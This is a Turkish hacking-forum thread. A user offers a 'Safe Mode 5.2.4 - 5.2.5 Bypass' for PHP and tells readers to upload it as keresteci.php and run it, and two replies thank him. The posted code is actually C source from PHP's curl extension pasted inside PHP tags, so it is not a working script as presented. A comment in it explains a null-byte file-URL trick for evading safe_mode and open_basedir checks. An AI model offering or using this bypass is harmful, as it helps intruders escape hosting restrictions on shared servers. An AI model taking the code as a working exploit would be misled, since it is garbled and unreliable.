Safe Mode 5.2.4 - 5.2.5 Bypass :)

keresteci

Yeni Üye
Katılım
1 Eki 2012
Mesajlar
87
Tepkime puanı
0
Puanları
0
Server e keresteci.php yapip İçine Girmeniz Yeterli :D
Kod:
Safe Mode  5.2.4 - 5.2.5 Bypass ./KereSteci Styla


<?php
#define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret);
	if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) && strncasecmp(str, "file:", sizeof("file:") - 1) == 0){
		php_url *tmp_url;
		if (!(tmp_url = php_url_parse_ex(str, len))) {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str);
			php_curl_ret(__ret);
		}
		if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s' contains unencoded control characters", str);
			php_url_free(tmp_url);
			php_curl_ret(__ret);
		}

		if (tmp_url->query || tmp_url->fragment || php_check_open_basedir(tmp_url->path TSRMLS_CC) ||
			(PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+", CHECKUID_CHECK_MODE_PARAM))){
			php_url_free(tmp_url);
			php_curl_ret(__ret);
		}
		php_url_free(tmp_url);
}
/*
if you have tmp_url = php_url_parse_ex(str, len) where:
str = "file://safe_mode_bypass\x00".__FILE__

and this function will return:
tmp_url->path = __FILE__

curl_init() functions checks safemode and openbasedir for tmp_url->path. Not for real path.
*/
if (argc > 0) {
	char *urlcopy;
	urlcopy = estrndup(Z_STRVAL_PP(url), Z_STRLEN_PP(url));
	curl_easy_setopt(ch->cp, CURLOPT_URL, urlcopy);
	zend_llist_add_element(&ch->to_free.str, &urlcopy);
}
?>


Bi Teşekur u Fazla Gormeyin :)
 

x-Qey

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,843
Tepkime puanı
0
Puanları
0
Yaş
30
Sagol Odun Knka
 

tolizuga

Forumdan Uzaklaştırıldı
Katılım
6 May 2013
Mesajlar
228
Tepkime puanı
0
Puanları
0
eywallaa
 
Üst
Copyright® Ajanlar.org 2012